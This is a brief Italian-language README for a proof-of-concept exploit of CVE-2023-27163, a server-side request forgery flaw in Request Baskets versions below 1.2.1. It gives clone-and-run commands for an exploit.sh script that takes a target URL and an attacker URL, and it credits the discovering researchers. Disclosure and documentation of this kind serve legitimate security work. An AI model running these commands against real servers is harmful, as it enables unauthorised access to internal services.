
CVE-2023-27163 - Request Baskets SSRF
Request Baskets SSRF PoC
alt text
Le versioni di Request Baskets <1.2.1 sono vulnerabili ad attacchi Server Side Request Forgery (SSRF) tramite il componente /api/baskets/{name}.
git clone https://github.com/rvizx/CVE-2023-27163
cd CVE-2023-27163
chmod +x exploit.sh
./exploit.sh <target_url> <attacker_url>
Crediti a @beet1e della Shanghai Jiao Tong University e a @chenlibo147 , @houqinsheng, [email protected] della Shandong University. Articolo : https://notes.sjtu.edu.cn/s/MUUhEymt7#